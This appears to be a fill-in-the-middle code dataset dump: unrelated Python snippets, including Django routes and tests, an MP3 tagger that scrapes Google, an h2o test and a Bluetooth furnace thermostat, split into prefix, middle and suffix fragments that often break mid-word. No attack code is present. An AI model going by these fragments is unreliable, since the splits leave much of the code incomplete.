prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
# Make
sure to update package.json, too! version_info = (4, 3, 0) __version__ = '.'.join(map(str,
version_info))
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Tim Henderson
# Email: tim.tadh@hackthology.com
# For licensing see the LICENSE file in the top level directory.

from predictive import parse


def t_expr_compound():
    """Check that parse() agrees with Python's own evaluation of
    compound arithmetic expressions (precedence and associativity)."""
    cases = [
        (4*3/2, '4*3/2'),
        (4/2*3, '4/2*3'),
        ((3+9)*4/8, '(3+9)*4/8'),
        (((9-3)*(5-3))/2 + 2, '((9-3)*(5-3))/2 + 2'),
        (5 * 4 / 2 - 10 + 5 - 2 + 3, '5 * 4 / 2 - 10 + 5 - 2 + 3'),
        (5 / 4 * 2 + 10 - 5 * 2 / 3, '5 / 4 * 2 + 10 - 5 * 2 / 3'),
    ]
    for expected, expression in cases:
        assert expected == parse(expression)
# Python 2 module: tags a downloaded MP3 with ID3 metadata scraped from
# Google search result snippets, attaches cover art and renames the file.
import urllib2
import eyed3
import mechanize
import os
from bs4 import BeautifulSoup as bs
import unicodedata as ud
import sys
import string

# Force UTF-8 as the process-wide default codec so the implicit
# str/unicode conversions below do not raise UnicodeDecodeError.
reload(sys)
sys.setdefaultencoding('utf-8')


class Song:
    """One downloaded track: scrapes album/artist/genre/featured-artist
    info from Google and writes it into the file's ID3 tag."""

    def __init__(self, keyword, filename, albumart, aaformat, dd='/home/praneet/Music/'):
        # keyword is an '@'-separated string: title@artist@album.
        self.info = keyword.split('@')
        self.filename = os.path.join(dd, filename).encode('utf-8')
        self.keyword = urllib2.quote(('').join(self.info))
        self.albumart = albumart  # path to the cover-art image on disk
        self.aaformat = aaformat  # image format suffix, e.g. 'jpeg'
        self.album = ''
        self.artist = string.capwords(self.info[1])
        self.title = self.info[0]
        self.feat = ' '  # single-space sentinel: "no featured artist"
        self.genre = 'Unknown'
        self.dd = dd
        # Kick off the scrape immediately on construction.
        self.fetchID3()

    def fetchID3(self):
        """Scrape album/artist/genre/featured-artist from Google's
        knowledge-panel rows for '<title> <artist> song'."""
        browser = mechanize.Browser()
        browser.set_handle_robots(False)  # ignore robots.txt
        browser.addheaders = [('User-agent','Mozilla')]
        searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' song')
        html = browser.open(searchURL)
        soup = bs(html, 'html.parser')
        # NOTE(review): '_o0d' is a Google-internal CSS class for fact rows
        # ("Album: X", "Artist: Y"); this is fragile and may break any time.
        souplist = soup.findAll(attrs={'class':'_o0d'})
        for i in range(1,len(souplist)):
            # Each row looks like "Key: Value"; dispatch on the key.
            if souplist[i].get_text().split(':')[0].lower() == 'album' or souplist[i].get_text().split(':')[0].lower() == 'movie':
                self.album = souplist[i].get_text().split(':')[1]
                print 'album ',souplist[i].get_text().split(':')[1]
            elif souplist[i].get_text().split(':')[0].lower() == 'artist' or souplist[i].get_text().split(':')[0].lower() == 'artists':
                self.artist = souplist[i].get_text().split(':')[1]
                print 'artist ',souplist[i].get_text().split(':')[1]
            elif souplist[i].get_text().split(':')[0].lower() == 'genre' or souplist[i].get_text().split(':')[0].lower() == 'genres':
                self.genre = souplist[i].get_text().split(':')[1]
                print 'genre ',souplist[i].get_text().split(':')[1]
            elif souplist[i].get_text().split(':')[0].lower() == 'featured artist' or souplist[i].get_text().split(':')[0].lower() == 'featured artists':
                self.feat = souplist[i].get_text().split(':')[1]
                print 'featured artist ',souplist[i].get_text().split(':')[1]
            else:
                pass
        self.fetchalbum()

    def fetchalbum(self):
        """Fallback album lookup: search '<title> <artist> album name',
        then fall back to the keyword's third field or '<title>- Single'."""
        browser = mechanize.Browser()
        browser.set_handle_robots(False)
        browser.addheaders = [('User-agent','Mozilla')]
        searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' album name')
        html = browser.open(searchURL)
        soup = bs(html, 'html.parser')
        # '_B5d' is the CSS class of the big answer card -- same fragility
        # caveat as '_o0d' above.
        for i in soup.findAll(attrs={'class':'_B5d'}):
            if self.album == '':
                self.album = i.get_text()
                print self.album
                break
        if self.album == '':
            # Use the album field from the original keyword if present,
            # otherwise treat the track as a single.
            if not self.info[2].isspace() and self.info[2] != '':
                self.album = string.capwords(self.info[2])
            else:
                self.album = self.title + '- Single'
            print 'album', self.album

    def updateID3(self):
        """Write the collected metadata and cover art into the MP3's ID3
        tag, then rename the file to '<title>.mp3' (prompting on clash)."""
        audiofile = eyed3.load(self.filename)
        # unicode() raises if the value is already a unicode object;
        # in that case assign the value as-is.
        try:
            audiofile.tag.artist = unicode(self.artist, "utf-8")
        except:
            audiofile.tag.artist = self.artist
        try:
            audiofile.tag.album = unicode(self.album, "utf-8")
        except:
            audiofile.tag.album = self.album
        title = ''
        if self.feat == ' ':
            title = self.title
        else:
            title = self.title+' ft. '+self.feat
        try:
            audiofile.tag.title = unicode(title, "utf-8")
        except:
            audiofile.tag.title = title
        try:
            audiofile.tag.genre = unicode(self.genre, "utf-8")
        except:
            audiofile.tag.genre = self.genre
        # 3 is the ID3 picture type for "front cover".
        audiofile.tag.images.set(3, open(self.albumart,'rb').read(), 'image/'+self.aaformat)
        audiofile.tag.save()
        if not os.path.isfile(self.dd+title+'.mp3'):
            os.rename(self.filename, self.dd+title.rstrip()+'.mp3')
        else:
            newTitle = raw_input('Similar file already exits, enter new file name: ')
            os.rename(self.filename, self.dd+newTitle.rstrip()+'.mp3')
        print 'update complete'
        os.remove(self.albumart)

# newsong = Song('Rockabye','Rockabye.mp3', 'rockabye','rockabye album art.jpeg','jpeg')
# newsong.updateID3()
etting. """ apphooks = ( '%s.%s' % (APP_MODULE, APP_NAME), ) with SettingsOverride(CMS_APPHOOKS=apphooks): apphook_pool.clear() hooks = apphook_pool.get_apphooks() app_names = [hook[0] for hook in hooks] self.assertEqual(len(hooks), 1) self.assertEqual(app_names, [APP_NAME]) apphook_pool.clear() def test_implicit_apphooks(self): """ Test implicit apphook loading with INSTALLED_APPS + cms_app.py """ apps = ['cms.test_utils.project.sampleapp'] with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() hooks = apphook_pool.get_apphooks() app_names = [hook[0] for hook in hooks] self.assertEqual(len(hooks), 1) self.assertEqual(app_names, [APP_NAME]) apphook_pool.clear() def test_apphook_on_root(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="SampleApp") blank_page = create_page("not-apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="", slug='blankapp') english_title = page.title_set.all()[0] self.assertEquals(english_title.language, 'en') create_title("de", "aphooked-page-de", page, apphook="SampleApp") self.assertTrue(page.publish()) self.assertTrue(blank_page.publish()) response = self.client.get(self.get_pages_root()) self.assertTemplateUsed(response, 'sampleapp/home.html') response = self.client.get('/en/blankapp/') self.assertTemplateUsed(response, 'nav_playground.html') apphook_pool.clear() def test_apphook_on_root_reverse(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("apphooked-page", "nav_playground.html", "en", created_by=superuser, 
published=True, apphook="SampleApp") create_title("de", "aphooked-page-de", page, apphook="SampleApp") self.assertTrue(page.publish()) self.assertFalse(reverse('sample-settings').startswith('//')) apphook_pool.clear() def test_get_page_for_apphook(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("home", "nav_playground.html", "en", created_by=superuser, published=True) create_title('de', page.get_title(), page) child_page = create_page("child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=page) create_title('de', child_page.get_title(), child_page) child_child_page = create_page("child_child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp') create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp') child_child_page.publish() # publisher_public is set to draft on publish, issue with onetoone reverse child_child_page = self.reload(child_child_page) en_title = child_child_page.publisher_public.get_title_obj('en') path = reverse('en:sample-settings') request = self.get_request(path) request.LANGUAGE_CODE = 'en' attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash self.assertEquals(attached_to_page.pk, en_title.page.pk) response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/home.html') self.assertContains(response, en_title.title) de_title = child_child_page.publisher_public.get_title_obj('de') path = reverse('de:sample-settings') request = self.get_request(path) request.LANGUAGE_CODE = 'de' attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix self.assertEquals(attached_to_page.pk, de_title.page.pk) response = 
self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/home.html') self.assertContains(response, de_title.title) apphook_pool.clear() def test_include_urlconf(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("home", "nav_playground.html", "en", created_by=superuser, published=True) create_title('de', page.get_title(), page) child_page = create_page("child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=page) create_title('de', child_page.get_title(), child_page) child_child_page = create_page("child_child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp') create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp') child_child_page.publish() path = reverse('extra_second') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test included urlconf") path = reverse('extra_first') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTem
plateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test urlconf") path = reverse('de:extra_first') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test urlconf") pa
th = reverse('de:extra_second') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test included urlconf") apphook_pool.clear() def test_apphook_breaking_under_home_with_new_path_caching(self): with SettingsOverride(CMS_MODERATOR=False, CMS_PERMISSION=False): home = create_page("home", "nav_playground.html", "en", published=True) child = create_page("child", "nav_playground.html", "en", published=True, parent=home) # not-home is what breaks stuff, because it contains the slug of the home page not_home = create_page("not-home", "nav_playground.html", "en", published=True, parent=child)
# URL routes for the gallery app (legacy Django ``patterns()`` syntax,
# removed in Django 1.10 -- this file targets an older Django).
from django.conf.urls import patterns, url, include

from .views import GalleryListView, GalleryDetailView

urlpatterns = patterns("",
    # List view: /gallery_list/
    url(
        regex=r"^gallery_list/$",
        view=GalleryListView.as_view(),
        name="gallery_list",
    ),
    # Detail view: /gallery/<pk>/ where pk is a numeric primary key.
    url(
        regex=r"^gallery/(?P<pk>\d+)/$",
        view=GalleryDetailView.as_view(),
        name="gallery_detail",
    ),
)
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flag related helpers for sole tenancy related commands."""
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute import scope as compute_scope

# Maps the zonal scope to the 'compute.hostTypes' resource collection so
# host-type flags can be resolved to full resource references.
SOLE_TENANCY_HOST_TYPE_RESOLVER = compute_flags.ResourceResolver.FromMap(
    'sole tenancy host type',
    {compute_scope.ScopeEnum.ZONE: 'compute.hostTypes'})
# Python 2 h2o integration test: trains a Deep Learning model on a
# synthetic two-class dataset and checks the scored classification error.
import unittest, time, sys, re
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_nn, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_gbm


def write_syn_dataset(csvPathname, rowCount, rowDataTrue, rowDataFalse, outputTrue, outputFalse):
    # Write a balanced two-class CSV: first half of the rows get the
    # "true" feature row + label, second half the "false" ones.
    dsf = open(csvPathname, "w+")
    for i in range(int(rowCount/2)):
        dsf.write(rowDataTrue + ',' + outputTrue + "\n")
    for i in range(int(rowCount/2)):
        dsf.write(rowDataFalse + ',' + outputFalse + "\n")
    dsf.close()


class test_NN_twovalues(unittest.TestCase):
    def tearDown(self):
        # After each test, scan the h2o sandbox logs for errors.
        h2o.check_sandbox_for_errors()

    @classmethod
    def setUpClass(cls):
        # fails with 3
        global SEED
        SEED = h2o.setup_random_seed()
        # Single-node cloud with a 4 GB Java heap.
        h2o.init(1, java_heap_GB=4)
        # h2b.browseTheCloud()

    @classmethod
    def tearDownClass(cls):
        h2o.tear_down_cloud(h2o.nodes)

    def test_DeepLearning_twovalues(self):
        SYNDATASETS_DIR = h2o.make_syn_dir()
        csvFilename = "syn_twovalues.csv"
        csvPathname = SYNDATASETS_DIR + '/' + csvFilename
        # Two fixed, linearly separable feature rows.
        rowDataTrue = "1, 0, 65, 1, 2, 1, 1, 4, 1, 4, 1, 4"
        rowDataFalse = "0, 1, 0, -1, -2, -1, -1, -4, -1, -4, -1, -4"
        # (outputTrue, outputFalse, case, coeffNum) -- the labels vary per
        # trial; case/coeffNum are carried along but not all are used here.
        twoValueList = [
            ('A','B',0, 14),
            ('A','B',1, 14),
            (0,1,0, 12),
            (0,1,1, 12),
            (0,1,'NaN', 12),
            (1,0,'NaN', 12),
            (-1,1,0, 12),
            (-1,1,1, 12),
            (-1e1,1e1,1e1, 12),
            (-1e1,1e1,-1e1, 12),
        ]
        trial = 0
        for (outputTrue, outputFalse, case, coeffNum) in twoValueList:
            write_syn_dataset(csvPathname, 20, rowDataTrue, rowDataFalse, str(outputTrue), str(outputFalse))
            start = time.time()
            hex_key = csvFilename + "_" + str(trial)
            model_key = 'trial_' + str(trial) + '.hex'
            validation_key = hex_key
            parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key)
            print "using outputTrue: %s outputFalse: %s" % (outputTrue, outputFalse)
            inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
            print "\n" + csvPathname, \
                " numRows:", "{:,}".format(inspect['numRows']), \
                " numCols:", "{:,}".format(inspect['numCols'])
            # The label is the last column ('C<numCols>' in h2o naming).
            response = inspect['numCols']
            response = 'C' + str(response)
            kwargs = {
                'ignored_cols' : None,
                'response' : response,
                'classification' : 1,
                'activation' : 'Tanh',
                #'input_dropout_ratio' : 0.2,
                'hidden' : '113,71,54',
                'rate' : 0.01,
                'rate_annealing' : 1e-6,
                'momentum_start' : 0,
                'momentum_stable' : 0,
                'l1' : 0.0,
                'l2' : 1e-6,
                'seed' : 80023842348,
                'loss' : 'CrossEntropy',
                #'max_w2' : 15,
                'initial_weight_distribution' : 'UniformAdaptive',
                #'initial_weight_scale' : 0.01,
                'epochs' : 100,
                'destination_key' : model_key,
                'validation' : hex_key,
            }
            timeoutSecs = 60
            start = time.time()
            h2o_cmd.runDeepLearning(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
            print "trial #", trial, "Deep Learning end on ", csvFilename, ' took', time.time() - start, 'seconds'
            #### Now score using the model, and check the validation error
            expectedErr = 0.00
            relTol = 0.01
            predict_key = 'Predict.hex'
            kwargs = {
                'data_key': validation_key,
                'destination_key': predict_key,
                'model_key': model_key
            }
            predictResult = h2o_cmd.runPredict(timeoutSecs=timeoutSecs, **kwargs)
            h2o_cmd.runInspect(key=predict_key, verbose=True)
            kwargs = { }
            predictCMResult = h2o.nodes[0].predict_confusion_matrix(
                actual=validation_key,
                vactual=response,
                predict=predict_key,
                vpredict='predict',
                timeoutSecs=timeoutSecs, **kwargs)
            cm = predictCMResult['cm']
            print h2o_gbm.pp_cm(cm)
            actualErr = h2o_gbm.pp_cm_summary(cm)/100.
            print "actual classification error:" + format(actualErr)
            print "expected classification error:" + format(expectedErr)
            # NOTE(review): expectedErr is 0.0, so whenever actualErr != 0 the
            # relative-error division below raises ZeroDivisionError instead of
            # a clean assertion failure -- confirm whether that is intended.
            if actualErr != expectedErr and abs((expectedErr - actualErr)/expectedErr) > relTol:
                raise Exception("Scored classification error of %s is not within %s %% relative error of %s" % (actualErr, float(relTol)*100, expectedErr))
            trial += 1

if __name__ == '__main__':
    h2o.unit_main()
de, default_temp) config.default_temp_away = default_temp else: config.indoor_temp_target=default_temp_away elif (0 <= now.hour < 7) and home_status=='home': config.mode='night' if config.mode == default_temp_mode and default_temp != default_temp_night: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_night = default_temp else: config.indoor_temp_target = default_temp_night elif 7 <= now.hour and home_status=='home': config.mode='day' if config.mode == default_temp_mode and default_temp != default_temp_day: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_day = default_temp else: config.indoor_temp_target = default_temp_day else: # Weekend if home_status=='away': config.mode='away' if config.mode == default_temp_mode and default_temp != default_temp_away: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_away = default_temp else: config.indoor_temp_target=default_temp_away elif (0 <= now.hour < 8) and home_status=='home': config.mode='night' if config.mode == default_temp_mode and default_temp != default_temp_night: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_night = default_temp else: config.indoor_temp_target = default_temp_night elif 8 <= now.hour and home_status=='home': config.mode='day' if config.mode == default_temp_mode and default_temp != default_temp_day: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_day = default_temp else: config.indoor_temp_target = default_temp_day config.write return config def checkPresence(config): """Pings all configured devices to determine 
who's at home""" no_of_users_at_home=0 last_time_home=config.last_time_home now = mktime(datetime.now().utctimetuple()) for device in config.presence_devices_wifi: if device['timestamp'] >= now - 600: print "Assuming %s is still at home" % device['owner'] no_of_users_at_home+=1 if no_of_users_at_home == 0: for device in config.presence_devices_wifi: if ping(device['ip_address']) > 0: print "%s seems to be at home" % device['owner'] device['timestamp']=now last_time_home=now no_of_users_at_home+=1 if no_of_users_at_home > 0: home_status='home' else: home_status='away' else: home_status='home' return last_time_home, home_status, config.presence_devices_wifi def btConnection(config, sendchar = 'n', close_after = True): """Creates a bluetooth connection to the relay, sends a command and returns the result""" print("opening Bluetooth connection") i = 1 timed_out = False while True: try: furnace_socket=bluetooth.BluetoothSocket( bluetooth.RFCOMM ) if furnace_socket.getpeername()[0] != config.bluetooth_addr: furnace_socket.connect((config.bluetooth_addr, config.bluetooth_port)) furnace_socket.settimeout(10) print "Bluetooth connected" furnace_socket.send(sendchar+'[') response_byte = furnace_socket.recv(1) break except bluetooth.btcommon.BluetoothError as error: print(".") print error time.sleep(1) i += 1 if i >= 30 and sendchar != '': timed_out = True break if close_after: print("closing Bluetooth connection") furnace_socket.close() if not timed_out: response_bin = bin(ord(response_byte))[2:].zfill(config.relay_channels) response_bit_list = map(int, list(response_bin)) response_bit_list.reverse() return response_bit_list else: return False def turnOnFurnace(config, furnace_no): """turns on a furnace using the bluetooth relay""" channels = config.relay_channels if furnace_no <= channels: relaychar = chr(101+furnace_no) elif furnace_no == channels + 1: relaychar = 'd' else: print("Error: no such furnace!") #raise furnace_state = btConnection(config, relaychar, 
close_after=False) if furnace_state: if furnace_state[furnace_no]: print("furnace %s turned on") % furnace_no elif sum(furnace_state) == channels: print("all furnaces turned on") else: print("Error: furnace has not been turned on!") #raise else: print("Error: furnace has not been turned on!") #raise return furnace_state def turnOffFurnace(config, furnace_no): """turns off a furnace using the bluetooth relay""" channels = config.relay_channels if furnace_no <= channels: relaychar = chr(111+furnace_no) elif furnace_no == channels + 1: relaychar = 'n' else: print("Error: no such furnace!") #raise furnace_state = btConnection(config, relaychar, close_after=True) if furnace_state[furnace_no]: print("Error: furnace has not been turned off!") #raise elif sum(furnace_state) == 0: print("all furnaces turned off") else: print("furnace %s turned off") % furnace_no retu
rn furnace_state def
checkOutdoorTemp(zip_code): """Gets outdoor temperature for our ZIP code from Yahoo!""" try: yahoo_com_result = pywapi.get_weather_from_yahoo( zip_code, units = 'metric' ) outdoor_temperature = int(yahoo_com_result['condition']['temp']) except (KeyError, AttributeError, httplib.BadStatusLine): outdoor_temperature = 0 return outdoor_temperature def checkIndoorTemp(config): """Gets indoor temperature from USB thermometer using command line tool""" # repeat forever - temper is very flaky tries = 0 while True: tries += 1 try: indoor_temp = float(subprocess.Popen("/usr/local/bin/temper", stdout=subprocess.PIPE).communicate()[0]) break except ValueError: print "Oops! Did not get a temperature. Trying again..." if tries == 10: # better turn off the furnace, probably an issue with the USB device turnOffFurnace(config, config.primary_furnace) return indoor_temp def transmit(config, outdoor_temp, indoor_temp): """Transmits the current state to the server for reporting and gets targets set in the web GUI (if any exist)""" furnace_state=config.furnace_state primary_furnace=config.primary_furnace indoor_temp_target_dict={} # round up or down to half degrees C rounded_indoor_temp = round(indoor_temp*10/5)/2 print "It is %s degrees Celsius - target is %s (outdoors it's %s degrees Celsius)" % (rounded_indoor_temp, config.indoor_temp_target, outdoor_temp) values = { 't' : indoor_temp, 'g' : config.indoor_temp_target, 'h' : config.home_status, 'f' : furnace_state[primary_furnace], 'r' : config.room, 's' : config.secret, 'o' : outdoo
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES

from swgpy.object import *


def create(kernel):
    # Build the shared creature template for the male Trandoshan
    # Binayre ruffian NPC; kernel is supplied by the template loader.
    result = Creature()
    result.template = "object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.iff"
    result.attribute_template_id = 9
    result.stfName("npc_name","trandoshan_base_male")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####

    return result
# -*- coding: utf-8 -*-
#
# This tool helps you rebase your package to the latest version
# Copyright (C) 2013-2019 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hráček <phracek@redhat.com>
#          Tomáš Hozza <thozza@redhat.com>
#          Nikola Forró <nforro@redhat.com>
#          František Nečas <fifinecas@seznam.cz>

import logging

from typing import cast

from rebasehelper.logger import CustomLogger

logger: CustomLogger = cast(CustomLogger, logging.getLogger(__name__))


class InputHelper:
    """Class for command line interaction with the user."""

    @staticmethod
    def strtobool(message):
        """Converts a user message to a corresponding truth value.

        This method is a replacement for deprecated strtobool from distutils,
        its behaviour remains the same.

        Args:
            message (str): Message to evaluate.

        Returns:
            bool: True on 'y', 'yes', 't', 'true', 'on' and '1'.
                  False on 'n', 'no', 'f', 'false', 'off' and '0'.

        Raises:
            ValueError: On any other value.

        """
        message = message.lower()
        if message in ('y', 'yes', 't', 'true', 'on', '1'):
            return True
        elif message in ('n', 'no', 'f', 'false', 'off', '0'):
            return False
        raise ValueError('No conversion to truth value for "{}"'.format(message))

    @classmethod
    def get_message(cls, message, default_yes=True, any_input=False):
        """Prompts a user with yes/no message and gets the response.

        Args:
            message (str): Prompt string.
            default_yes (bool): If the default value should be YES.
            any_input (bool): Whether to return default value regardless of input.

        Returns:
            bool: True or False, based on user's input.

        """
        choice = '[Y/n]' if default_yes else '[y/N]'
        if any_input:
            msg = '{0} '.format(message)
        else:
            msg = '{0} {1}? '.format(message, choice)

        while True:
            user_input = input(msg).lower()

            # Empty input -- or any_input mode, which ignores the typed text
            # entirely -- yields the default answer.
            # (The original also had an unreachable `if any_input: return True`
            # after strtobool(); this branch already covers that case.)
            if not user_input or any_input:
                return default_yes

            try:
                # strtobool returns a bool, so it can be returned directly.
                return cls.strtobool(user_input)
            except ValueError:
                logger.error('You have to type y(es) or n(o).')
#!/usr/bin/env python
#coding=utf8
# Tornado-style user-area handlers: dashboard and profile pages.
import datetime
import logging

from handler import UserBaseHandler
from lib.route import route
from lib.util import vmobile


@route(r'/user', name='user')  # User back-office home page
class UserHandler(UserBaseHandler):
    def get(self):
        # Cache the current user in the session; session failures are
        # deliberately non-fatal (the page still renders).
        user = self.get_current_user()
        try:
            self.session['user'] = user
            self.session.save()
        except:
            pass
        self.render('user/index.html')


@route(r'/user/profile', name='user_profile')  # User profile page
class ProfileHandler(UserBaseHandler):
    def get(self):
        self.render('user/profile.html')

    def post(self):
        # No form processing here yet -- just bounce back to the profile.
        self.redirect('/user/profile')
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetGlossary
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
#   python3 -m pip install google-cloud-translate


# [START translate_v3beta1_generated_TranslationService_GetGlossary_sync]
from google.cloud import translate_v3beta1


def sample_get_glossary():
    """Fetch a single glossary by resource name and print it."""
    # Create a client
    client = translate_v3beta1.TranslationServiceClient()

    # Initialize request argument(s)
    request = translate_v3beta1.GetGlossaryRequest(
        name="name_value",
    )

    # Make the request
    response = client.get_glossary(request=request)

    # Handle the response
    print(response)

# [END translate_v3beta1_generated_TranslationService_GetGlossary_sync]
from galaxy.test.base.twilltestcase import TwillTestCase
#from twilltestcase import TwillTestCase


class EncodeTests(TwillTestCase):
    # Test methods run in alphabetical order, so test_00_first clears the
    # history before test_10_Encode_Data imports the ENCODE datasets.

    def test_00_first(self): # will run first due to its name
        """3B_GetEncodeData: Clearing history"""
        self.clear_history()

    def test_10_Encode_Data(self):
        """3B_GetEncodeData: Getting encode data"""
        # Only the first dataset is imported/checked; the rest of the list
        # is kept commented out (presumably to shorten the test run).
        self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] )
        # hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] )
        self.wait()
        self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1)
        # self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2)
        # self.check_data('cc.LateRepSeg.20051216.bed', hid=3)
        # self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4)
        # self.check_data('cc.MidRepSeg.20051216.bed', hid=5)
        # self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
# Account URL routes built on Django's (pre-2.0) function-based auth views.
from django.conf.urls import url
from django.contrib.auth.views import login, \
    logout, \
    logout_then_login, \
    password_change, \
    password_change_done, \
    password_reset, \
    password_reset_done, \
    password_reset_confirm, \
    password_reset_complete

from . import views

urlpatterns = [
    url(r'^$', views.dashboard, name='dashboard'),
    # login / logout urls
    url(r'^login/$', view=login, name='login'),
    url(r'^logout/$', view=logout, name='logout'),
    url(r'^logout-then-login/$', view=logout_then_login, name='logout_then_login'),
    # change password urls
    url(r'^password-change/$', view=password_change, name='password_change'),
    url(r'^password-change/done/$', view=password_change_done, name='password_change_done'),
    # restore password urls
    url(r'^password-reset/$', view=password_reset, name='password_reset'),
    url(r'^password-reset/done/$', view=password_reset_done, name='password_reset_done'),
    url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', view=password_reset_confirm, name='password_reset_confirm'),
    url(r'^password-reset/complete/$', view=password_reset_complete, name='password_reset_complete'),
]
from lacuna.building import MyBuilding


class fission(MyBuilding):
    """Client-side wrapper for the Fission Reactor building."""
    # Server endpoint path for this building type.
    path = 'fission'

    def __init__(self, client, body_id: int = 0, building_id: int = 0):
        # Delegates all behaviour to MyBuilding; this subclass exists only
        # to bind the 'fission' endpoint path.
        super().__init__(client, body_id, building_id)
"""Unit tests for RIDE's test-case name validation/creation and for
reordering library imports in the import-settings table."""
import unittest
from nose.tools import assert_equals

from robotide.robotapi import TestCaseFile, TestCaseFileSettingTable
from robotide.controller.filecontrollers import TestCaseFileController
from robotide.controller.tablecontrollers import ImportSettingsController

VALID_NAME = 'Valid name'


class TestCaseNameValidationTest(unittest.TestCase):
    """Names must be non-empty, non-blank and unique (case- and
    underscore-insensitively), except against the test being renamed."""

    def setUp(self):
